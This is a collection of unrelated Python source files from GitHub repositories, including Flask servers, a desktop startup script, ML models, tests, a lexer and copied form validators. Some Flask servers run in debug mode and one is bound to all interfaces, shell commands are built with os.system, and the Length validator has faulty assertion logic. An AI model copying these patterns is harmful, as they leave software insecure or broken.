cursor.fetchone() == None:\n cursor.execute(\"INSERT INTO doctors (identifier) VALUES (?)\", (id,))\n\n cursor.execute(\"SELECT * FROM doctors WHERE identifier = ?\", (id,))\n doctor = cursor.fetchone()\n cursor.execute(\"SELECT location FROM alerts WHERE alert_time > ?\", (doctor[\"last_updated\"],))\n alerts = cursor.fetchall()\n for alert in alerts:\n response[\"alerts\"].append(alert[\"location\"])\n\n\n cursor.execute(\"UPDATE doctors SET last_updated = CURRENT_TIMESTAMP WHERE identifier = ?\", (id,))\n con.commit()\n return jsonify(response)\n return jsonify({\"error\": \"Invalid request\"}) # yuk, ugly code\n return jsonify(response)\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n\n@app.route('/alert', methods=['POST'])\ndef alert():\n try:\n location = request.get_json()[\"location\"]\n with sql.connect(db) as con:\n con.row_factory = sql.Row\n cursor = con.cursor()\n cursor.execute(\"INSERT INTO alerts (location) VALUES(?)\", (location,))\n return jsonify({\"status\": \"RECEIVED\"})\n return jsonify({\"error\": \"Error happened.\"})\n except Exception as e:\n return jsonify({\"error\": str(e)})\n\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","repo_name":"apomalyn/MissionHack-applicationMobile","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8389707788","text":"# some varialbles\nlogi_mouse_sensi = -0.6 # needs to me between -1 and 1\n\n#########\n\nimport os\n\n\ndef ls_system():\n os.system(\"ls\")\n\ndef is_screen_connected(ID):\n stream = os.popen(f'xrandr | grep {ID}')\n output = stream.read()\n return \" connected\" in output\n\ndef is_usb_connected(name):\n stream = os.popen(f'lsusb | grep \"{name}\"')\n output = stream.read()\n s = name in output\n if s: print(f\"{name}: connected\")\n else: print(f\"{name}: not connected\")\n return s\n\ndef run_app(app):\n stream = os.popen(f\"pgrep {app}\")\n output = stream.read()\n s = len(output)>1\n if s: print(f\"{app}: already running\")\n else:\n os.system(f\"{app} &\")\n print(f\"{app}: now set to run\")\n\n\n# check screen connection\nif is_screen_connected(\"HDMI-0\") and is_screen_connected(\"DP-0\"):\n os.system(\"xrandr --output DP-0 --right-of HDMI-0\")\n print(\"Dual monitor: DP-0 set to the right of HDMI-0\")\n\nif is_screen_connected(\"HDMI-0\"):\n os.system(\"xrandr --output HDMI-0 --mode 1920x1080 --rate 74\")\n print(\"HDMI-0: resolution and rate set\")\nelse: print(\"HDMI-0: not connected\")\n\nif is_screen_connected(\"DP-0\"):\n os.system(\"xrandr --output DP-0 --mode 2560x1080 --rate 200\")\n print(\"DP-0: resolution and rate set\")\nelse: print(\"DP-0: not connected\")\n\n\n# special case for Logitech mouse\nmouse_status = False\nif is_usb_connected(\"Logitech, Inc. USB Receiver\"):\n os.system(f'xinput --set-prop \"Logitech USB Receiver\" \"libinput Accel Speed\" {logi_mouse_sensi}')\n mouse_status = True\nif is_usb_connected(\"Logitech, Inc. PRO X Wireless\"):\n os.system(f'xinput --set-prop \"Logitech PRO X Wireless\" \"libinput Accel Speed\" {logi_mouse_sensi}')\n mouse_status = True\n\nif mouse_status:\n print(f\"Logitech mouse sensivity set to {logi_mouse_sensi}\")\n\n\n\nrun_app(\"redshift-gtk\")\nrun_app(\"autotiling\")\nrun_app(\"megasync\")\n","repo_name":"clement3872/dotefiles","sub_path":"scripts/startup/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11213449204","text":"import torch\nimport torch.nn as nn\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n\n def forward(self, x):\n return self.fn(x) + x\n\n\nclass ConvMixer(nn.Module):\n def __init__(self, dim, depth, kernel_size=9, patch_size=16, n_classes=1000):\n super().__init__()\n self.patch_embed = nn.Sequential(\n nn.Conv2d(3, dim, kernel_size=patch_size, stride=patch_size),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n )\n self.conv_mixer_blocks = nn.ModuleList([nn.Sequential(\n # Depthwise Convolution\n Residual(nn.Sequential(\n nn.Conv2d(dim, dim, kernel_size, groups=dim, padding=\"same\"),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n )),\n # Pointwise Convolution\n nn.Conv2d(dim, dim, kernel_size=1),\n nn.GELU(),\n nn.BatchNorm2d(dim)\n ) for _ in range(depth)])\n self.projection = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Flatten(),\n nn.Linear(dim, n_classes)\n )\n\n def forward(self, x):\n x = self.patch_embed(x)\n for blk in self.conv_mixer_blocks:\n x = blk(x)\n\n x = self.projection(x)\n\n return x\n \n\nif __name__ == '__main__':\n x = torch.rand(32, 3, 128, 128)\n model = ConvMixer(512, 3)\n y = model(x)\n print(y.shape)\n ","repo_name":"plumprc/Toy-code-python","sub_path":"Models/convmixer.py","file_name":"convmixer.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17883575815","text":"import cv2\r\nimport os\r\nfrom PIL import Image, ImageFilter\r\ndef video(who, bot, message):\r\n cam = cv2.VideoCapture(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/video.mp4\")\r\n try:\r\n if not os.path.exists(os.getcwd().replace(\"\\\\\", \"/\") + '/' + str(who) + '/data'):\r\n os.makedirs(os.getcwd().replace(\"\\\\\", \"/\") + '/' + str(who) + '/data')\r\n except OSError:\r\n print('Error: Creating directory of data')\r\n # frame\r\n currentframe = 0\r\n frames = 0\r\n while (True):\r\n ret, frame = cam.read()\r\n if ret:\r\n if currentframe % 1 == 0:\r\n name = \"./\" + str(who) + '/data/' + str(frames) + \".jpg\"\r\n cv2.imwrite(name, frame)\r\n i = Image.open(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/data/\" + str(frames) + \".jpg\")\r\n i = i.filter(ImageFilter.SHARPEN)\r\n i = i.resize((128, 128))\r\n i = i.filter(ImageFilter.SHARPEN)\r\n picture_x, picture_y = i.size\r\n for a in range(picture_x):\r\n for b in range(picture_y):\r\n s, d, f = i.getpixel((a, b))\r\n if s <= 128:\r\n s = 0\r\n else:\r\n s = 255\r\n if d <= 128:\r\n d = 0\r\n else:\r\n d = 255\r\n if f <= 128:\r\n f = 0\r\n else:\r\n f = 255\r\n i.putpixel((a, b), (s, d, f))\r\n i = i.transpose(Image.ROTATE_180)\r\n i.save(os.getcwd().replace(\"\\\\\", \"/\") + \"/\" + str(who) + \"/data/\" + str(frames) + \".jpg\")\r\n frames += 1\r\n currentframe += 1\r\n else:\r\n bot.send_message(message.chat.id, \"Your video has loaded successfully\")\r\n return frames\r\n break\r\n cam.release()\r\n cv2.destroyAllWindows()","repo_name":"Andrey17009/McpiMapScreen","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12963178453","text":"from numpy import float32, ones\nfrom pytest import mark\n\nfrom deepdoctection.datapoint.annotation import CategoryAnnotation, ImageAnnotation\nfrom deepdoctection.datapoint.box import BoundingBox\nfrom deepdoctection.datapoint.image import Image\nfrom deepdoctection.datapoint.view import Page\nfrom deepdoctection.utils.settings import LayoutType, Relationships\n\nfrom ..test_utils import get_test_path\nfrom .conftest import WhiteImage\n\n\n@mark.basic\ndef test_page_from_image(dp_image_with_layout_and_word_annotations: Image) -> None:\n \"\"\"\n test page gets converted from an image correctly\n \"\"\"\n # Arrange\n dp_image = dp_image_with_layout_and_word_annotations\n title_ann = dp_image.get_annotation(category_names=[\"title\"])[0]\n title_ann.dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n text_ann = dp_image.get_annotation(category_names=[\"text\"])[0]\n text_ann.dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n\n word_anns = dp_image.get_annotation(category_names=\"word\")\n\n word_anns[0].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n word_anns[1].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n word_anns[2].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"1\")\n )\n word_anns[3].dump_sub_category(\n Relationships.reading_order, CategoryAnnotation(category_name=Relationships.reading_order, category_id=\"2\")\n )\n\n # Act\n page = Page.from_image(\n dp_image,\n LayoutType.word,\n [LayoutType.text, LayoutType.title, LayoutType.list],\n )\n\n # Assert\n assert page.text == \"hello world\\nbye world\\n\"\n\n\n@mark.basic\ndef test_image_with_anns_can_be_saved(image: WhiteImage) -> None:\n \"\"\"\n test save does not raise any exception\n \"\"\"\n\n # Arrange\n test_image = Image(location=image.loc, file_name=image.file_name)\n test_image.image = ones((24, 85, 3), dtype=float32)\n cat_1 = ImageAnnotation(\n category_name=\"table\",\n bounding_box=BoundingBox(ulx=15.0, uly=20.0, width=10.0, height=8.0, absolute_coords=True),\n )\n test_image.dump(cat_1)\n\n # Act\n page = Page.from_image(test_image, LayoutType.table, [LayoutType.table])\n\n try:\n page.save(dry=True)\n except Exception as exception: # pylint: disable=W0703\n assert False, f\"{exception}\"\n\n\n@mark.basic\ndef test_load_page_from_file() -> None:\n \"\"\"\n test class from_file returns a page\n \"\"\"\n test_file_path = get_test_path() / \"test_image.json\"\n image = Page.from_file(test_file_path.as_posix())\n assert isinstance(image, Page)\n","repo_name":"deepdoctection/deepdoctection","sub_path":"tests/datapoint/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":1814,"dataset":"github-code","pt":"52"} +{"seq_id":"41955500801","text":"from yapsy.IPlugin import IPlugin\nimport logging\nfrom ConfigParser import SafeConfigParser\n\nclass IRCPlugin(IPlugin):\n\n def __init__(self):\n \"\"\"\n Args:\n synchronous: If the plugin can be executed without blocking, syncrhonous can be set to true, to speed up execution. Please use with care.\n \"\"\"\n self.synchronous = False\n\n def get_configuration(self, config_file_string, attribute_dict_list = [{}]):\n \"\"\"\n Gets the configuration from a config file.\n\n Args:\n config_file_string: the string of the file to configure\n attribute_dict_list: a list of dictionaries with keys \"section\" and \"conf\" with the section of\n the conf file and the value of it.\n\n Returns: a dictionary with keys as attribute_dict_list's \"conf\"s.\n \"\"\"\n\n conf_results = {}\n\n try:\n parser = SafeConfigParser()\n parser.read(config_file_string)\n\n for di in attribute_dict_list:\n conf_results[di[\"conf\"]] = parser.get(di[\"section\"], di[\"conf\"])\n\n except Exception as e:\n logging.error(\"Error when parsing plugin info.\", exc_info=e)\n\n return conf_results\n","repo_name":"tian2992/tio_chema","sub_path":"plugins/ircplugin.py","file_name":"ircplugin.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"36638551887","text":"import asyncio\nimport logging\nimport time\nimport urllib.request\nfrom multiprocessing.dummy import Pool\n\nlog = logging.getLogger('perfomance_test')\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nURLS = [\n 'http://weather.com',\n 'http://google.com',\n 'http://yandex.ru',\n 'http://wikipedia.org',\n 'http://habrahabr.ru',\n 'http://ostrovok.org',\n 'http://booking.com',\n 'http://www.kaggle.com',\n 'http://www.habr.com',\n 'http://www.gitlab.com',\n 'http://www.github.com',\n]\n\n\ndef sync():\n start = time.time()\n for i, result in enumerate([\n urllib.request.urlopen(url)\n for url in URLS\n ]):\n pass\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Sync execution took {time.time()-start:.2f}')\n\n\ndef sync_threading():\n start = time.time()\n with Pool() as pool:\n results = pool.map(lambda url: urllib.request.urlopen(url), URLS)\n for i, result in enumerate(results):\n pass\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Sync execution with threading took {time.time()-start:.2f}')\n\n\nasync def main():\n start = time.time()\n loop = asyncio.get_event_loop()\n futures = [\n loop.run_in_executor(\n None,\n urllib.request.urlopen,\n url\n )\n for url in URLS\n ]\n for i, future in enumerate(asyncio.as_completed(futures)):\n result = await future\n # log.info(f'{i}, {result.url}, {result.read().decode(\"utf-8\").count(\"<\")}')\n log.info(f'###Async execution took {time.time()-start:.2f}')\n\nsync()\nsync_threading()\n\nioloop = asyncio.get_event_loop()\nioloop.run_until_complete(main())\nioloop.close()\n\n# Gives output like\n# 2018-07-20 10:33:54,303 - perfomance_test - INFO - ###Sync execution took 9.75\n# 2018-07-20 10:33:56,267 - perfomance_test - INFO - ###Sync execution with threading took 1.96\n# 2018-07-20 10:33:56,291 - asyncio - DEBUG - Using selector: KqueueSelector\n# 2018-07-20 10:33:57,695 - perfomance_test - INFO - ###Async execution took 1.40\n","repo_name":"AlexShein/just_code","sub_path":"asyncio_test.py","file_name":"asyncio_test.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33332964041","text":"\n\nclass ValidationError(ValueError):\n def __init__(self, message=\"\", *args, **kwargs):\n ValueError.__init__(self, message, *args, **kwargs)\n\n\nclass StopValidation(Exception):\n\n def __init__(self, message=\"\", *args, **kwargs):\n Exception.__init__(self, message, *args, **kwargs)\n\n\nclass EqualTo:\n def __init__(self, field_name, message=None):\n self.field_name = field_name\n self.message = message\n\n def __call__(self, form, field):\n try:\n other = form[self.field_name]\n except KeyError as exc:\n raise ValidationError(\n field.gettext(\"Invalid field name '%s'\" % self.field_name)\n ) from exc\n\n if field.data == other.data:\n return\n d = {\n \"other_label\": hasattr(other, \"label\") and other.label.text or self.field_name,\n \"other_name\": self.field_name\n }\n message = self.message\n if message is None:\n message = field.gettext(\"Field must be equal to %(other_name)s.\")\n raise ValidationError(message % d)\n\n\nclass Length:\n\n def __init__(self, min=-1, max=-1, message=None):\n assert (\n min != -1 or max != -1\n ), \"At least one of `min` or `max` must be specified\"\n assert max == -1 and min <= max, \"`min` cannot be more than `max`.\"\n\n self.min = min\n self.max = max\n self.message = message\n self.field_flags = {}\n if self.min != -1:\n self.field_flags[\"minlength\"] = self.min\n if self.max != -1:\n self.field_flags[\"maxlength\"] = self.max\n\n def __call__(self, form, field):\n length = field.data and len(field.data) or 0\n if length >= self.min and (self.max == -1 or length <= self.max):\n return\n\n if self.message is not None:\n message = self.message\n elif self.max == -1:\n message = field.ngettext(\n \"Field must be at least %(min)d character long.\",\n \"Field must be at least %(min)d characters long.\",\n self.max\n )\n elif self.min == -1:\n message = field.ngettext(\n \"Field cannot be longer than %(max)d character.\",\n \"Field cannot be longer than %(max)d characters.\",\n self.max,\n )\n elif self.min == self.max:\n message = field.ngettext(\n \"Field must be exactly %(max)d character long.\",\n \"Field must be exactly %(max)d characters long.\",\n self.max,\n )\n else:\n message = field.gettext(\n \"Field must be between %(min)d and %(max)d characters long.\"\n )\n\n raise ValidationError(message % dict(min=self.min, max=self.max, length=length))\n\n\n","repo_name":"Xerxes-cn/boring","sub_path":"boring_copy/wtforms/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43470966101","text":"import json\nfrom decimal import Decimal\nimport datetime as dt\nfrom tlx.util import string_from_datetime\n\n\ndef json_loads(x, **kwargs):\n \"\"\"Loads json for DynamoDB (Numerical types go to Decimal)\"\"\"\n return json.loads(x, parse_int=Decimal, parse_float=Decimal, **kwargs)\n\n\ndef json_dumps(x, **kwargs):\n \"\"\"Dumps json for DynamoDB (Numerical types go to Decimal) use indent=4 if required\"\"\"\n return json.dumps(x, cls=DynamoEncoder, separators=(',', ': '), **kwargs)\n\n\nclass DynamoEncoder(json.JSONEncoder):\n \"\"\" Makes type conversions to allow JSON serialisation using data types commonly used in the project\n Decimal -> float\n datetime -> ISO string\n \"\"\"\n\n def default(self, o, markers=None):\n if isinstance(o, Decimal):\n return float(o)\n if isinstance(o, dt.datetime):\n return string_from_datetime(o)\n return json.JSONEncoder(self).default(o, markers)\n","repo_name":"tlelson/tlx","sub_path":"tlx/dynamodb/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30874118520","text":"import ply.lex as lex\r\nimport re\r\nimport tablaSimbolos\r\n\r\n#Palabras reservadas\r\nreservadas = ['INT','BOOLEAN','STRING','IF','DEFAULT','BREAK','RETURN','FUNCTION','SWITCH','CASE','PRINT','LET','INPUT']\r\n\r\n#Tokens\r\ntokens = reservadas + ['ID','ENT','CAD','SUM','LLAVEL','LLAVER','PARL','PARR','PUNTS','FIN','COM','NOT','ASIGSUM','ASIG','COMMENT','PR','EQU','NOTEQU']\r\n\r\n#Token - String:\r\nmapTokToStr = {\r\n'(\\'ENT\\', None)' : 'entero',\r\n'(\\'CAD\\', None)' : 'cadena',\r\n'(\\'BOOLEAN\\', None)' : 'boolean',\r\n'(\\'SUM\\', None)' : '+',\r\n'(\\'LLAVEL\\', None)' : '{',\r\n'(\\'LLAVER\\', None)' : '}',\r\n'(\\'PARL\\', None)' : '(',\r\n'(\\'PARR\\', None)' : ')',\r\n'(\\'FIN\\', None)' : ';',\r\n'(\\'COM\\', None)' : ',',\r\n'(\\'NOT\\', None)' : '!',\r\n'(\\'ASIGSUM\\', None)' : '+=',\r\n'(\\'ASIG\\', None)' : '=',\r\n'(\\'EQU\\', None)' : '==',\r\n'(\\'NOTEQU\\', None)' : '!=',\r\n'(\\'PUNTS\\', None)' : ':',\r\n'(\\'PR\\', 1)' : 'int',\r\n'(\\'PR\\', 2)' : 'boolean',\r\n'(\\'PR\\', 3)' : 'string',\r\n'(\\'PR\\', 4)' : 'if',\r\n'(\\'PR\\', 5)' : 'default',\r\n'(\\'PR\\', 6)' : 'break',\r\n'(\\'PR\\', 7)' : 'return',\r\n'(\\'PR\\', 8)' : 'function',\r\n'(\\'PR\\', 9)' : 'switch',\r\n'(\\'PR\\', 10)' : 'case',\r\n'(\\'PR\\', 11)' : 'print',\r\n'(\\'PR\\', 12)' : 'input',\r\n'(\\'PR\\', 13)' : 'let', \r\n'(\\'ID\\', None)' : 'id',\r\n'(\\'EOF\\', None)' : 'Fin de fichero'\r\n}\r\n\r\ndef tokToStr(tok):\r\n\tif tok[0] in [\"CAD\", \"ID\", \"BOOLEAN\", \"ENT\"]:\r\n\t\ttok=(tok[0],None)\r\n\treturn mapTokToStr[str(tok)]\r\n\r\n#Tabla de palabras reservadas\r\nvalorReservadas = {'INT': 1, 'BOOLEAN': 2, 'STRING': 3, \r\n'IF': 4, 'DEFAULT': 5, 'BREAK': 6, 'RETURN': 7, 'FUNCTION': 8,\r\n'SWITCH': 9, 'CASE': 10, 'PRINT': 11, 'INPUT': 12, 'LET': 13,\r\n'TRUE': 'true', 'FALSE':'false' }\r\n\r\n\r\ntablaDeSimbolos = None\r\n\r\n#Expresiones Regulares\r\n\r\ndef t_COMMENT(t):\r\n\tr'(/\\*(.|\\n)*?\\*/)|(//.*)'\r\n\tncr = t.value.count(\"\\n\")\r\n\tt.lexer.lineno += ncr\r\n\r\n\r\ndef t_newline(t):\r\n\tr'\\n+'\r\n\tt.lexer.lineno += len(t.value)\r\n\r\ndef t_ASIGSUM(t):\r\n\tr'\\+='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_EQU(t):\r\n\tr'=='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_SUM(t):\r\n\tr'\\+'\r\n\tt.value=None\r\n\treturn t\r\n\r\nt_ignore = '\\t '\r\n\r\ndef t_LLAVEL(t):\r\n\tr'{'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_LLAVER(t):\r\n\tr'}'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PARL(t):\r\n\tr'\\('\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PARR(t):\r\n\tr'\\)'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_FIN(t):\r\n\tr';'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_COM(t):\r\n\tr','\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_PUNTS(t):\r\n\tr':'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_NOTEQU(t):\r\n\tr'!='\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_NOT(t):\r\n\tr'!'\r\n\tt.value=None\r\n\treturn t\r\n\r\ndef t_ASIG(t):\r\n\tr'='\r\n\tt.value=None\r\n\treturn t\r\n\r\n#Funciones\r\ndef t_ID(t):\r\n\tr'[a-zA-Z]+[a-zA-Z_0-9]*'\r\n\tlexema = t.value\r\n\tt.value=valorReservadas.get(t.value.upper(), 0)\r\n\t#print('Entrando en tID')\r\n\t#print(t.value)\r\n\t#Vemos si es cte booleana o PR\r\n\tif(t.value!=0):\r\n\t\tif t.value=='true':\r\n\t\t\tt.type='BOOLEAN'\r\n\t\t\tt.value=1\r\n\t\telif t.value=='false':\r\n\t\t\tt.type='BOOLEAN'\r\n\t\t\tt.value=0\r\n\t\telse:\r\n\t\t\tt.type='PR'\r\n\telse:\r\n\t\tt.value=tablaDeSimbolos.insertaNuevoID(lexema)\r\n\treturn t\r\n\r\ndef t_ENT(t):\r\n\tr'\\d+'\r\n\tt.type='ENT'\r\n\tif int(t.value) > 32767:\r\n\t\traise Exception('ERROR Lexito en linea '+ str(t.lexer.lineno) +': Entero supera el tamaño máximo')\r\n\tt.value=int(t.value)\r\n\treturn t\r\n\r\ndef t_CAD(t):\r\n\tr'(\\\"([^\\\\\\n]|(\\\\(.|\\n)))*?\\\")'\r\n\tif int(len(t.value)) > 64:\r\n\t\traise Exception('ERROR Lexito en linea '+ str(t.lexer.lineno) +': Cadena supera el tamaño máximo')\r\n\tt.value = '\\\"' +t.value[1:-1] +'\\\"'\r\n\treturn t\r\n\r\ndef t_error(t):\r\n\tprint(\"Illegal character '%s'\" % t.value[0])\r\n\tt.lexer.skip(1)\r\n\r\nclass AnalizadorLex:\r\n\t#Constructor\r\n\tdef __init__(self, ts=None):\r\n\t\tself.lexer = lex.lex()\r\n\t\tself.ftokens = open(\"tokens.txt\",\"w+\")\r\n\t\tglobal tablaDeSimbolos\r\n\t\ttablaDeSimbolos = ts\r\n\r\n\tdef anyadirToken(self, tok):\r\n\t\tself.ftokens.write('<' + tok.type + ','+ NoneOrString(tok.value) + '>\\n')\r\n\r\n#Funcion auxiliar que imprime vacio si es None o directamente el\r\n#string argumento s en caso contrario\r\ndef NoneOrString(s):\r\n\tif s is None:\r\n\t\treturn ''\r\n\treturn str(s)\r\n\r\n#Funcion Main\r\ndef main():\r\n\tanalizador = lex.lex()\r\n\tglobal tablaDeSimbolos\r\n\ttablaDeSimbolos = tablaSimbolos.TablaSimbolos()\r\n\r\n\tnFichero = input(\"Inserta nombre de fichero:\")\r\n\thandle = open(nFichero)\r\n\tcadena = handle.read()\r\n\tprint(cadena)\r\n\tanalizador.input(cadena)\r\n\tftokens = open(\"tokens.txt\",\"w+\")\r\n\r\n\ttok = analizador.token()\r\n\twhile tok is not None:\r\n\t\t#print(f'hola,{tok}')\r\n\t\tif not tok :\r\n\t\t\tprint(\"Token erroneo:\",tok)\r\n\t\t\tbreak\r\n\t\tprint('<' + tok.type + ','+ NoneOrString(tok.value) + ',linea:'+str(analizador.lineno)+'>')\r\n\t\tftokens.write('<' + tok.type + ','+ NoneOrString(tok.value) + '>\\n')\r\n\t\ttry:\r\n\t\t\ttok = analizador.token()\r\n\t\texcept Exception as error:\r\n\t\t\tprint(repr(error))\r\n\t\t\tftokens.close()\r\n\t\t\treturn\r\n\tftokens.close()\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"frankiemarley/PDL","sub_path":"lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42874022908","text":"import flask\nfrom flask import request, jsonify\nfrom flask_api import status\n\nfrom EN.loadEN import TTSLib as TTSEN\nfrom DE.loadDE import TTSLib as TTSDE\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# different instances for different languages\nttsEN = TTSEN()\nttsDE = TTSDE()\n\n\ndef readBytesOfFile(pathToFile):\n fileStreamRead = open(pathToFile, \"rb\")\n data = fileStreamRead.read()\n fileStreamRead.close()\n return data\n\n\ndef checkIfArgumentsAreValid(language):\n listOfStrings = ['de', 'deutsch', 'en', 'english']\n if language in listOfStrings:\n return True\n\n return False\n\n\ndef createAudioFile(receivedText, language):\n if \"en\" in language:\n ttsEN.generateAudio(receivedText)\n\n if \"de\" in language:\n ttsDE.generateAudio(receivedText)\n\n\ndef getByteList(data):\n byteList = []\n\n for byte in data:\n byteList.append(byte)\n\n return byteList\n\n\n@app.route('/audio', methods=['GET'])\ndef getAudioFromFile():\n\n receivedText = request.args.get(\"text\")\n language = request.args.get(\"language\")\n\n # https://www.flaskapi.org/api-guide/status-codes/\n if not checkIfArgumentsAreValid(language):\n content = {'Message': \"Invalid language selection!\"}\n return content, status.HTTP_400_BAD_REQUEST\n\n print(\"[GET-Request]: Data received: \", receivedText)\n createAudioFile(receivedText, language)\n byteList = getByteList(readBytesOfFile(\"./Audio/serverAudio.wav\"))\n\n return jsonify({'data': byteList})\n\n\napp.run(host='0.0.0.0')\n","repo_name":"SRFG-MAT/RoboGen-DeepSpeechServices","sub_path":"Server_Client/Scripts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73970372324","text":"import numbers\nimport math\nimport torch\nimport torchvision.transforms.functional as F\n\n\nclass GroupRandomResizedCrop(torch.nn.Module):\n def __init__(self, size, scale=(0.08, 1.0), ratio=(3. / 4., 4. / 3.)):\n super().__init__()\n self.size = size\n self.scale = scale\n self.ratio = ratio\n\n @staticmethod\n def get_params(img, scale, ratio):\n _, height, width = img.size()\n area = height * width\n\n log_ratio = torch.log(torch.tensor(ratio))\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n return i, j, h, w\n\n # Fallback to central crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(ratio):\n w = width\n h = int(round(w / min(ratio)))\n elif in_ratio > max(ratio):\n h = height\n w = int(round(h * max(ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n return i, j, h, w\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped and resized.\n\n Returns:\n PIL Image or Tensor: Randomly cropped and resized image.\n \"\"\"\n i, j, h, w = self.get_params(images[0], self.scale, self.ratio)\n return [F.resized_crop(img, i, j, h, w, self.size) for img in images]\n\n\nclass GroupRandomRotation(torch.nn.Module):\n def __init__(\n self, degrees, expand=False, center=None, fill=0, resample=None\n ):\n super().__init__()\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n\n self.center = center\n\n self.resample = resample\n self.expand = expand\n\n self.fill = fill\n\n @staticmethod\n def get_params(degrees) -> float:\n \"\"\"Get parameters for ``rotate`` for a random rotation.\n\n Returns:\n float: angle parameter to be passed to ``rotate`` for random rotation.\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n return angle\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be rotated.\n\n Returns:\n PIL Image or Tensor: Rotated image.\n \"\"\"\n fill = self.fill\n angle = self.get_params(self.degrees)\n\n return [F.rotate(img, angle=angle, resample=self.resample, expand=self.expand, center=self.center, fill=fill) for img in images]\n\n\nclass GroupRandomHorizontalFlip(torch.nn.Module):\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return [F.hflip(img) for img in images]\n return images\n\n\nclass GroupRandomVerticalFlip(torch.nn.Module):\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, images):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be flipped.\n\n Returns:\n PIL Image or Tensor: Randomly flipped image.\n \"\"\"\n if torch.rand(1) < self.p:\n return [F.vflip(img) for img in images]\n return images\n\n\nclass GroupColorJitter(torch.nn.Module):\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n super().__init__()\n self.brightness = self._check_input(brightness, 'brightness')\n self.contrast = self._check_input(contrast, 'contrast')\n self.saturation = self._check_input(saturation, 'saturation')\n self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 